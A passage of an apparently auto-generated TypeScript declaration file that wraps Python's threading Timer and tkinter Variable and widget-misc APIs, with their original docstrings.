t.cancel() # stop the timer's action if it's still waiting\n\t * \n\t * \n\t */\n\tfunction Timer(interval, func, args?, kwargs?): Promise<ITimer>\n\tfunction Timer$({ interval, func, args, kwargs }: { interval, func, args?, kwargs?}): Promise<ITimer>\n\tinterface ITimer extends IThread {\n\n\t\t/**\n\t\t * Stop the timer if it hasn't finished yet.\n\t\t */\n\t\tcancel(): Promise<any>\n\t\tcancel$($: {}): Promise<any>\n\t\trun(): Promise<any>\n\t\trun$($: {}): Promise<any>\n\t}\n\tinterface I_MainThread extends IThread {\n\t}\n\tinterface I_DummyThread extends IThread {\n\t\tis_alive(): Promise<any>\n\t\tis_alive$($: {}): Promise<any>\n\t\tjoin(timeout?): Promise<any>\n\t\tjoin$({ timeout }: { timeout?}): Promise<any>\n\t}\n\tlet get_ident: Promise<any>\n\tlet get_native_id: Promise<any>\n\tlet ThreadError: Promise<any>\n\tlet TIMEOUT_MAX: Promise<any>\n\tlet Lock: Promise<any>\n}\ndeclare module tkinter {\n\tvar _\n\n\t/**\n\t * Inhibit setting of default root window.\n\t * \n\t * Call this function to inhibit that the first instance of\n\t * Tk is used for windows without an explicit parent window.\n\t * \n\t */\n\tfunction NoDefaultRoot(): Promise<any>\n\tfunction NoDefaultRoot$($: {}): Promise<any>\n\n\t/**\n\t * Run the main loop of Tcl.\n\t */\n\tfunction mainloop(n?): Promise<any>\n\tfunction mainloop$({ n }: { n?}): Promise<any>\n\n\t/**\n\t * Convert Tcl object to True or False.\n\t */\n\tfunction getboolean(s): Promise<any>\n\tfunction getboolean$({ s }): Promise<any>\n\tfunction Tcl(screenName?, baseName?, className?, useTk?: boolean): Promise<any>\n\tfunction Tcl$({ screenName, baseName, className, useTk }: { screenName?, baseName?, className?, useTk?}): Promise<any>\n\tfunction image_names(): Promise<any>\n\tfunction image_names$($: {}): Promise<any>\n\tfunction image_types(): Promise<any>\n\tfunction image_types$($: {}): Promise<any>\n\tinterface IEventType {\n\t\tKeyPress\n\t\tKey\n\t\tKeyRelease\n\t\tButtonPress\n\t\tButton\n\t\tButtonRelease\n\t\tMotion\n\t\tEnter\n\t\tLeave\n\t\tFocusIn\n\t\tFocusOut\n\t\tKeymap\n\t\tExpose\n\t\tGraphicsExpose\n\t\tNoExpose\n\t\tVisibility\n\t\tCreate\n\t\tDestroy\n\t\tUnmap\n\t\tMap\n\t\tMapRequest\n\t\tReparent\n\t\tConfigure\n\t\tConfigureRequest\n\t\tGravity\n\t\tResizeRequest\n\t\tCirculate\n\t\tCirculateRequest\n\t\tProperty\n\t\tSelectionClear\n\t\tSelectionRequest\n\t\tSelection\n\t\tColormap\n\t\tClientMessage\n\t\tMapping\n\t\tVirtualEvent\n\t\tActivate\n\t\tDeactivate\n\t\tMouseWheel\n\t}\n\n\t/**\n\t * Container for the properties of an event.\n\t * \n\t * Instances of this type are generated if one of the following events occurs:\n\t * \n\t * KeyPress, KeyRelease - for keyboard events\n\t * ButtonPress, ButtonRelease, Motion, Enter, Leave, MouseWheel - for mouse events\n\t * Visibility, Unmap, Map, Expose, FocusIn, FocusOut, Circulate,\n\t * Colormap, Gravity, Reparent, Property, Destroy, Activate,\n\t * Deactivate - for window events.\n\t * \n\t * If a callback function for one of these events is registered\n\t * using bind, bind_all, bind_class, or tag_bind, the callback is\n\t * called with an Event as first argument. It will have the\n\t * following attributes (in braces are the event types for which\n\t * the attribute is valid):\n\t * \n\t * serial - serial number of event\n\t * num - mouse button pressed (ButtonPress, ButtonRelease)\n\t * focus - whether the window has the focus (Enter, Leave)\n\t * height - height of the exposed window (Configure, Expose)\n\t * width - width of the exposed window (Configure, Expose)\n\t * keycode - keycode of the pressed key (KeyPress, KeyRelease)\n\t * state - state of the event as a number (ButtonPress, ButtonRelease,\n\t * Enter, KeyPress, KeyRelease,\n\t * Leave, Motion)\n\t * state - state as a string (Visibility)\n\t * time - when the event occurred\n\t * x - x-position of the mouse\n\t * y - y-position of the mouse\n\t * x_root - x-position of the mouse on the screen\n\t * (ButtonPress, ButtonRelease, KeyPress, KeyRelease, Motion)\n\t * y_root - y-position of the mouse on the screen\n\t * (ButtonPress, ButtonRelease, KeyPress, KeyRelease, Motion)\n\t * char - pressed character (KeyPress, KeyRelease)\n\t * send_event - see X/Windows documentation\n\t * keysym - keysym of the event as a string (KeyPress, KeyRelease)\n\t * keysym_num - keysym of the event as a number (KeyPress, KeyRelease)\n\t * type - type of the event as a number\n\t * widget - widget in which the event occurred\n\t * delta - delta of wheel movement (MouseWheel)\n\t * \n\t */\n\tinterface IEvent {\n\t}\n\n\t/**\n\t * Class to define value holders for e.g. buttons.\n\t * \n\t * Subclasses StringVar, IntVar, DoubleVar, BooleanVar are specializations\n\t * that constrain the type of the value returned from get().\n\t */\n\n\t/**\n\t * Construct a variable\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to \"\")\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction Variable(master?, value?, name?): Promise<IVariable>\n\tfunction Variable$({ master, value, name }: { master?, value?, name?}): Promise<IVariable>\n\tinterface IVariable {\n\n\t\t/**\n\t\t * Set the variable to VALUE.\n\t\t */\n\t\tset(value): Promise<any>\n\t\tset$({ value }): Promise<any>\n\n\t\t/**\n\t\t * Return value of variable.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Define a trace callback for the variable.\n\t\t * \n\t\t * Mode is one of \"read\", \"write\", \"unset\", or a list or tuple of\n\t\t * such strings.\n\t\t * Callback must be a function which is called when the variable is\n\t\t * read, written or unset.\n\t\t * \n\t\t * Return the name of the callback.\n\t\t * \n\t\t */\n\t\ttrace_add(mode, callback): Promise<any>\n\t\ttrace_add$({ mode, callback }): Promise<any>\n\n\t\t/**\n\t\t * Delete the trace callback for a variable.\n\t\t * \n\t\t * Mode is one of \"read\", \"write\", \"unset\" or a list or tuple of\n\t\t * such strings. Must be same as were specified in trace_add().\n\t\t * cbname is the name of the callback returned from trace_add().\n\t\t * \n\t\t */\n\t\ttrace_remove(mode, cbname): Promise<any>\n\t\ttrace_remove$({ mode, cbname }): Promise<any>\n\n\t\t/**\n\t\t * Return all trace callback information.\n\t\t */\n\t\ttrace_info(): Promise<any>\n\t\ttrace_info$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Define a trace callback for the variable.\n\t\t * \n\t\t * MODE is one of \"r\", \"w\", \"u\" for read, write, undefine.\n\t\t * CALLBACK must be a function which is called when\n\t\t * the variable is read, written or undefined.\n\t\t * \n\t\t * Return the name of the callback.\n\t\t * \n\t\t * This deprecated method wraps a deprecated Tcl method that will\n\t\t * likely be removed in the future. Use trace_add() instead.\n\t\t * \n\t\t */\n\t\ttrace_variable(mode, callback): Promise<any>\n\t\ttrace_variable$({ mode, callback }): Promise<any>\n\n\t\t/**\n\t\t * Delete the trace callback for a variable.\n\t\t * \n\t\t * MODE is one of \"r\", \"w\", \"u\" for read, write, undefine.\n\t\t * CBNAME is the name of the callback returned from trace_variable or trace.\n\t\t * \n\t\t * This deprecated method wraps a deprecated Tcl method that will\n\t\t * likely be removed in the future. Use trace_remove() instead.\n\t\t * \n\t\t */\n\t\ttrace_vdelete(mode, cbname): Promise<any>\n\t\ttrace_vdelete$({ mode, cbname }): Promise<any>\n\n\t\t/**\n\t\t * Return all trace callback information.\n\t\t * \n\t\t * This deprecated method wraps a deprecated Tcl method that will\n\t\t * likely be removed in the future. Use trace_info() instead.\n\t\t * \n\t\t */\n\t\ttrace_vinfo(): Promise<any>\n\t\ttrace_vinfo$($: {}): Promise<any>\n\t\tinitialize\n\t\ttrace\n\t}\n\n\t/**\n\t * Value holder for strings variables.\n\t */\n\n\t/**\n\t * Construct a string variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to \"\")\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction StringVar(master?, value?, name?): Promise<IStringVar>\n\tfunction StringVar$({ master, value, name }: { master?, value?, name?}): Promise<IStringVar>\n\tinterface IStringVar extends IVariable {\n\n\t\t/**\n\t\t * Return value of variable as string.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Value holder for integer variables.\n\t */\n\n\t/**\n\t * Construct an integer variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to 0)\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction IntVar(master?, value?, name?): Promise<IIntVar>\n\tfunction IntVar$({ master, value, name }: { master?, value?, name?}): Promise<IIntVar>\n\tinterface IIntVar extends IVariable {\n\n\t\t/**\n\t\t * Return the value of the variable as an integer.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Value holder for float variables.\n\t */\n\n\t/**\n\t * Construct a float variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to 0.0)\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction DoubleVar(master?, value?, name?): Promise<IDoubleVar>\n\tfunction DoubleVar$({ master, value, name }: { master?, value?, name?}): Promise<IDoubleVar>\n\tinterface IDoubleVar extends IVariable {\n\n\t\t/**\n\t\t * Return the value of the variable as a float.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Value holder for boolean variables.\n\t */\n\n\t/**\n\t * Construct a boolean variable.\n\t * \n\t * MASTER can be given as master widget.\n\t * VALUE is an optional value (defaults to False)\n\t * NAME is an optional Tcl name (defaults to PY_VARnum).\n\t * \n\t * If NAME matches an existing variable and VALUE is omitted\n\t * then the existing value is retained.\n\t * \n\t */\n\tfunction BooleanVar(master?, value?, name?): Promise<IBooleanVar>\n\tfunction BooleanVar$({ master, value, name }: { master?, value?, name?}): Promise<IBooleanVar>\n\tinterface IBooleanVar extends IVariable {\n\n\t\t/**\n\t\t * Set the variable to VALUE.\n\t\t */\n\t\tset(value): Promise<any>\n\t\tset$({ value }): Promise<any>\n\n\t\t/**\n\t\t * Return the value of the variable as a bool.\n\t\t */\n\t\tget(): Promise<any>\n\t\tget$($: {}): Promise<any>\n\t}\n\n\t/**\n\t * Internal class.\n\t * \n\t * Base class which defines methods common for interior widgets.\n\t */\n\tinterface IMisc {\n\n\t\t/**\n\t\t * Internal function.\n\t\t * \n\t\t * Delete all Tcl commands created for\n\t\t * this widget in the Tcl interpreter.\n\t\t */\n\t\tdestroy(): Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Internal function.\n\t\t * \n\t\t * Delete the Tcl command provided in NAME.\n\t\t */\n\t\tdeletecommand(name): Promise<any>\n\t\tdeletecommand$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Set Tcl internal variable, whether the look and feel\n\t\t * should adhere to Motif.\n\t\t * \n\t\t * A parameter of 1 means adhere to Motif (e.g. no color\n\t\t * change if mouse passes over slider).\n\t\t * Returns the set value.\n\t\t */\n\t\ttk_strictMotif(boolean?): Promise<any>\n\t\ttk_strictMotif$({ boolean }: { boolean?}): Promise<any>\n\n\t\t/**\n\t\t * Change the color scheme to light brown as used in Tk 3.6 and before.\n\t\t */\n\t\ttk_bisque(): Promise<any>\n\t\ttk_bisque$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set a new color scheme for all widget elements.\n\t\t * \n\t\t * A single color as argument will cause that all colors of Tk\n\t\t * widget elements are derived from this.\n\t\t * Alternatively several keyword parameters and its associated\n\t\t * colors can be given. The following keywords are valid:\n\t\t * activeBackground, foreground, selectColor,\n\t\t * activeForeground, highlightBackground, selectBackground,\n\t\t * background, highlightColor, selectForeground,\n\t\t * disabledForeground, insertBackground, troughColor.\n\t\t */\n\t\ttk_setPalette(): Promise<any>\n\t\ttk_setPalette$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Wait until the variable is modified.\n\t\t * \n\t\t * A parameter of type IntVar, StringVar, DoubleVar or\n\t\t * BooleanVar must be given.\n\t\t */\n\t\twait_variable(name?): Promise<any>\n\t\twait_variable$({ name }: { name?}): Promise<any>\n\n\t\t/**\n\t\t * Wait until a WIDGET is destroyed.\n\t\t * \n\t\t * If no parameter is given self is used.\n\t\t */\n\t\twait_window(window?): Promise<any>\n\t\twait_window$({ window }: { window?}): Promise<any>\n\n\t\t/**\n\t\t * Wait until the visibility of a WIDGET changes\n\t\t * (e.g. it appears).\n\t\t * \n\t\t * If no parameter is given self is used.\n\t\t */\n\t\twait_visibility(window?): Promise<any>\n\t\twait_visibility$({ window }: { window?}): Promise<any>\n\n\t\t/**\n\t\t * Set Tcl variable NAME to VALUE.\n\t\t */\n\t\tsetvar(name?, value?): Promise<any>\n\t\tsetvar$({ name, value }: { name?, value?}): Promise<any>\n\n\t\t/**\n\t\t * Return value of Tcl variable NAME.\n\t\t */\n\t\tgetvar(name?): Promise<any>\n\t\tgetvar$({ name }: { name?}): Promise<any>\n\t\tgetint(s): Promise<any>\n\t\tgetint$({ s }): Promise<any>\n\t\tgetdouble(s): Promise<any>\n\t\tgetdouble$({ s }): Promise<any>\n\n\t\t/**\n\t\t * Return a boolean value for Tcl boolean values true and false given as parameter.\n\t\t */\n\t\tgetboolean(s): Promise<any>\n\t\tgetboolean$({ s }): Promise<any>\n\n\t\t/**\n\t\t * Direct input focus to this widget.\n\t\t * \n\t\t * If the application currently does not have the focus\n\t\t * this widget will get the focus if the application gets\n\t\t * the focus through the window manager.\n\t\t */\n\t\tfocus_set(): Promise<any>\n\t\tfocus_set$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Direct input focus to this widget even if the\n\t\t * application does not have the focus. Use with\n\t\t * caution!\n\t\t */\n\t\tfocus_force(): Promise<any>\n\t\tfocus_force$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which has currently the focus in the\n\t\t * application.\n\t\t * \n\t\t * Use focus_displayof to allow working with several\n\t\t * displays. Return None if application does not have\n\t\t * the focus.\n\t\t */\n\t\tfocus_get(): Promise<any>\n\t\tfocus_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which has currently the focus on the\n\t\t * display where this widget is located.\n\t\t * \n\t\t * Return None if the application does not have the focus.\n\t\t */\n\t\tfocus_displayof(): Promise<any>\n\t\tfocus_displayof$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which would have the focus if top level\n\t\t * for this widget gets the focus from the window manager.\n\t\t */\n\t\tfocus_lastfor(): Promise<any>\n\t\tfocus_lastfor$($: {}): Promise<any>\n\n\t\t/**\n\t\t * The widget under mouse will get automatically focus. Can not\n\t\t * be disabled easily.\n\t\t */\n\t\ttk_focusFollowsMouse(): Promise<any>\n\t\ttk_focusFollowsMouse$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the next widget in the focus order which follows\n\t\t * widget which has currently the focus.\n\t\t * \n\t\t * The focus order first goes to the next child, then to\n\t\t * the children of the child recursively and then to the\n\t\t * next sibling which is higher in the stacking order. A\n\t\t * widget is omitted if it has the takefocus resource set\n\t\t * to 0.\n\t\t */\n\t\ttk_focusNext(): Promise<any>\n\t\ttk_focusNext$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return previous widget in the focus order. See tk_focusNext for details.\n\t\t */\n\t\ttk_focusPrev(): Promise<any>\n\t\ttk_focusPrev$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Call function once after given time.\n\t\t * \n\t\t * MS specifies the time in milliseconds. FUNC gives the\n\t\t * function which shall be called. Additional parameters\n\t\t * are given as parameters to the function call. Return\n\t\t * identifier to cancel scheduling with after_cancel.\n\t\t */\n\t\tafter(ms, func?): Promise<any>\n\t\tafter$({ ms, func }: { ms, func?}): Promise<any>\n\n\t\t/**\n\t\t * Call FUNC once if the Tcl main loop has no event to\n\t\t * process.\n\t\t * \n\t\t * Return an identifier to cancel the scheduling with\n\t\t * after_cancel.\n\t\t */\n\t\tafter_idle(func): Promise<any>\n\t\tafter_idle$({ func }): Promise<any>\n\n\t\t/**\n\t\t * Cancel scheduling of function identified with ID.\n\t\t * \n\t\t * Identifier returned by after or after_idle must be\n\t\t * given as first parameter.\n\t\t * \n\t\t */\n\t\tafter_cancel(id): Promise<any>\n\t\tafter_cancel$({ id }): Promise<any>\n\n\t\t/**\n\t\t * Ring a display's bell.\n\t\t */\n\t\tbell(displayof?): Promise<any>\n\t\tbell$({ displayof }: { displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Retrieve data from the clipboard on window's display.\n\t\t * \n\t\t * The window keyword defaults to the root window of the Tkinter\n\t\t * application.\n\t\t * \n\t\t * The type keyword specifies the form in which the data is\n\t\t * to be returned and should be an atom name such as STRING\n\t\t * or FILE_NAME. Type defaults to STRING, except on X11, where the default\n\t\t * is to try UTF8_STRING and fall back to STRING.\n\t\t * \n\t\t * This command is equivalent to:\n\t\t * \n\t\t * selection_get(CLIPBOARD)\n\t\t * \n\t\t */\n\t\tclipboard_get(): Promise<any>\n\t\tclipboard_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Clear the data in the Tk clipboard.\n\t\t * \n\t\t * A widget specified for the optional displayof keyword\n\t\t * argument specifies the target display.\n\t\t */\n\t\tclipboard_clear(): Promise<any>\n\t\tclipboard_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Append STRING to the Tk clipboard.\n\t\t * \n\t\t * A widget specified at the optional displayof keyword\n\t\t * argument specifies the target display. The clipboard\n\t\t * can be retrieved with selection_get.\n\t\t */\n\t\tclipboard_append(string): Promise<any>\n\t\tclipboard_append$({ string }): Promise<any>\n\n\t\t/**\n\t\t * Return widget which has currently the grab in this application\n\t\t * or None.\n\t\t */\n\t\tgrab_current(): Promise<any>\n\t\tgrab_current$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Release grab for this widget if currently set.\n\t\t */\n\t\tgrab_release(): Promise<any>\n\t\tgrab_release$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set grab for this widget.\n\t\t * \n\t\t * A grab directs all events to this and descendant\n\t\t * widgets in the application.\n\t\t */\n\t\tgrab_set(): Promise<any>\n\t\tgrab_set$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set global grab for this widget.\n\t\t * \n\t\t * A global grab directs all events to this and\n\t\t * descendant widgets on the display. Use with caution -\n\t\t * other applications do not get events anymore.\n\t\t */\n\t\tgrab_set_global(): Promise<any>\n\t\tgrab_set_global$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return None, \"local\" or \"global\" if this widget has\n\t\t * no, a local or a global grab.\n\t\t */\n\t\tgrab_status(): Promise<any>\n\t\tgrab_status$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set a VALUE (second parameter) for an option\n\t\t * PATTERN (first parameter).\n\t\t * \n\t\t * An optional third parameter gives the numeric priority\n\t\t * (defaults to 80).\n\t\t */\n\t\toption_add(pattern, value, priority?): Promise<any>\n\t\toption_add$({ pattern, value, priority }: { pattern, value, priority?}): Promise<any>\n\n\t\t/**\n\t\t * Clear the option database.\n\t\t * \n\t\t * It will be reloaded if option_add is called.\n\t\t */\n\t\toption_clear(): Promise<any>\n\t\toption_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the value for an option NAME for this widget\n\t\t * with CLASSNAME.\n\t\t * \n\t\t * Values with higher priority override lower values.\n\t\t */\n\t\toption_get(name, className): Promise<any>\n\t\toption_get$({ name, className }): Promise<any>\n\n\t\t/**\n\t\t * Read file FILENAME into the option database.\n\t\t * \n\t\t * An optional second parameter gives the numeric\n\t\t * priority.\n\t\t */\n\t\toption_readfile(fileName, priority?): Promise<any>\n\t\toption_readfile$({ fileName, priority }: { fileName, priority?}): Promise<any>\n\n\t\t/**\n\t\t * Clear the current X selection.\n\t\t */\n\t\tselection_clear(): Promise<any>\n\t\tselection_clear$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the contents of the current X selection.\n\t\t * \n\t\t * A keyword parameter selection specifies the name of\n\t\t * the selection and defaults to PRIMARY. A keyword\n\t\t * parameter displayof specifies a widget on the display\n\t\t * to use. A keyword parameter type specifies the form of data to be\n\t\t * fetched, defaulting to STRING except on X11, where UTF8_STRING is tried\n\t\t * before STRING.\n\t\t */\n\t\tselection_get(): Promise<any>\n\t\tselection_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Specify a function COMMAND to call if the X\n\t\t * selection owned by this widget is queried by another\n\t\t * application.\n\t\t * \n\t\t * This function must return the contents of the\n\t\t * selection. The function will be called with the\n\t\t * arguments OFFSET and LENGTH which allows the chunking\n\t\t * of very long selections. The following keyword\n\t\t * parameters can be provided:\n\t\t * selection - name of the selection (default PRIMARY),\n\t\t * type - type of the selection (e.g. STRING, FILE_NAME).\n\t\t */\n\t\tselection_handle(command): Promise<any>\n\t\tselection_handle$({ command }): Promise<any>\n\n\t\t/**\n\t\t * Become owner of X selection.\n\t\t * \n\t\t * A keyword parameter selection specifies the name of\n\t\t * the selection (default PRIMARY).\n\t\t */\n\t\tselection_own(): Promise<any>\n\t\tselection_own$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return owner of X selection.\n\t\t * \n\t\t * The following keyword parameter can\n\t\t * be provided:\n\t\t * selection - name of the selection (default PRIMARY),\n\t\t * type - type of the selection (e.g. STRING, FILE_NAME).\n\t\t */\n\t\tselection_own_get(): Promise<any>\n\t\tselection_own_get$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Send Tcl command CMD to different interpreter INTERP to be executed.\n\t\t */\n\t\tsend(interp, cmd): Promise<any>\n\t\tsend$({ interp, cmd }): Promise<any>\n\n\t\t/**\n\t\t * Lower this widget in the stacking order.\n\t\t */\n\t\tlower(belowThis?): Promise<any>\n\t\tlower$({ belowThis }: { belowThis?}): Promise<any>\n\n\t\t/**\n\t\t * Raise this widget in the stacking order.\n\t\t */\n\t\ttkraise(aboveThis?): Promise<any>\n\t\ttkraise$({ aboveThis }: { aboveThis?}): Promise<any>\n\n\t\t/**\n\t\t * Return integer which represents atom NAME.\n\t\t */\n\t\twinfo_atom(name, displayof?): Promise<any>\n\t\twinfo_atom$({ name, displayof }: { name, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Return name of atom with identifier ID.\n\t\t */\n\t\twinfo_atomname(id, displayof?): Promise<any>\n\t\twinfo_atomname$({ id, displayof }: { id, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Return number of cells in the colormap for this widget.\n\t\t */\n\t\twinfo_cells(): Promise<any>\n\t\twinfo_cells$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all widgets which are children of this widget.\n\t\t */\n\t\twinfo_children(): Promise<any>\n\t\twinfo_children$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return window class name of this widget.\n\t\t */\n\t\twinfo_class(): Promise<any>\n\t\twinfo_class$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return True if at the last color request the colormap was full.\n\t\t */\n\t\twinfo_colormapfull(): Promise<any>\n\t\twinfo_colormapfull$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the widget which is at the root coordinates ROOTX, ROOTY.\n\t\t */\n\t\twinfo_containing(rootX, rootY, displayof?): Promise<any>\n\t\twinfo_containing$({ rootX, rootY, displayof }: { rootX, rootY, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of bits per pixel.\n\t\t */\n\t\twinfo_depth(): Promise<any>\n\t\twinfo_depth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return true if this widget exists.\n\t\t */\n\t\twinfo_exists(): Promise<any>\n\t\twinfo_exists$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels for the given distance NUMBER\n\t\t * (e.g. \"3c\") as float.\n\t\t */\n\t\twinfo_fpixels(number): Promise<any>\n\t\twinfo_fpixels$({ number }): Promise<any>\n\n\t\t/**\n\t\t * Return geometry string for this widget in the form \"widthxheight+X+Y\".\n\t\t */\n\t\twinfo_geometry(): Promise<any>\n\t\twinfo_geometry$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return height of this widget.\n\t\t */\n\t\twinfo_height(): Promise<any>\n\t\twinfo_height$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return identifier ID for this widget.\n\t\t */\n\t\twinfo_id(): Promise<any>\n\t\twinfo_id$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of all Tcl interpreters for this display.\n\t\t */\n\t\twinfo_interps(displayof?): Promise<any>\n\t\twinfo_interps$({ displayof }: { displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Return true if this widget is mapped.\n\t\t */\n\t\twinfo_ismapped(): Promise<any>\n\t\twinfo_ismapped$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the window manager name for this widget.\n\t\t */\n\t\twinfo_manager(): Promise<any>\n\t\twinfo_manager$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of this widget.\n\t\t */\n\t\twinfo_name(): Promise<any>\n\t\twinfo_name$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the name of the parent of this widget.\n\t\t */\n\t\twinfo_parent(): Promise<any>\n\t\twinfo_parent$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the pathname of the widget given by ID.\n\t\t */\n\t\twinfo_pathname(id, displayof?): Promise<any>\n\t\twinfo_pathname$({ id, displayof }: { id, displayof?}): Promise<any>\n\n\t\t/**\n\t\t * Rounded integer value of winfo_fpixels.\n\t\t */\n\t\twinfo_pixels(number): Promise<any>\n\t\twinfo_pixels$({ number }): Promise<any>\n\n\t\t/**\n\t\t * Return the x coordinate of the pointer on the root window.\n\t\t */\n\t\twinfo_pointerx(): Promise<any>\n\t\twinfo_pointerx$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of x and y coordinates of the pointer on the root window.\n\t\t */\n\t\twinfo_pointerxy(): Promise<any>\n\t\twinfo_pointerxy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the y coordinate of the pointer on the root window.\n\t\t */\n\t\twinfo_pointery(): Promise<any>\n\t\twinfo_pointery$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return requested height of this widget.\n\t\t */\n\t\twinfo_reqheight(): Promise<any>\n\t\twinfo_reqheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return requested width of this widget.\n\t\t */\n\t\twinfo_reqwidth(): Promise<any>\n\t\twinfo_reqwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of integer RGB values in range(65536) for color in this widget.\n\t\t */\n\t\twinfo_rgb(color): Promise<any>\n\t\twinfo_rgb$({ color }): Promise<any>\n\n\t\t/**\n\t\t * Return x coordinate of upper left corner of this widget on the\n\t\t * root window.\n\t\t */\n\t\twinfo_rootx(): Promise<any>\n\t\twinfo_rootx$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return y coordinate of upper left corner of this widget on the\n\t\t * root window.\n\t\t */\n\t\twinfo_rooty(): Promise<any>\n\t\twinfo_rooty$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the screen name of this widget.\n\t\t */\n\t\twinfo_screen(): Promise<any>\n\t\twinfo_screen$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of the cells in the colormap of the screen\n\t\t * of this widget.\n\t\t */\n\t\twinfo_screencells(): Promise<any>\n\t\twinfo_screencells$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of bits per pixel of the root window of the\n\t\t * screen of this widget.\n\t\t */\n\t\twinfo_screendepth(): Promise<any>\n\t\twinfo_screendepth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the height of the screen of this widget\n\t\t * in pixel.\n\t\t */\n\t\twinfo_screenheight(): Promise<any>\n\t\twinfo_screenheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the height of the screen of\n\t\t * this widget in mm.\n\t\t */\n\t\twinfo_screenmmheight(): Promise<any>\n\t\twinfo_screenmmheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the width of the screen of\n\t\t * this widget in mm.\n\t\t */\n\t\twinfo_screenmmwidth(): Promise<any>\n\t\twinfo_screenmmwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return one of the strings directcolor, grayscale, pseudocolor,\n\t\t * staticcolor, staticgray, or truecolor for the default\n\t\t * colormodel of this screen.\n\t\t */\n\t\twinfo_screenvisual(): Promise<any>\n\t\twinfo_screenvisual$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the number of pixels of the width of the screen of\n\t\t * this widget in pixel.\n\t\t */\n\t\twinfo_screenwidth(): Promise<any>\n\t\twinfo_screenwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information of the X-Server of the screen of this widget in\n\t\t * the form \"XmajorRminor vendor vendorVersion\".\n\t\t */\n\t\twinfo_server(): Promise<any>\n\t\twinfo_server$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the toplevel widget of this widget.\n\t\t */\n\t\twinfo_toplevel(): Promise<any>\n\t\twinfo_toplevel$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return true if the widget and all its higher ancestors are mapped.\n\t\t */\n\t\twinfo_viewable(): Promise<any>\n\t\twinfo_viewable$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return one of the strings directcolor, 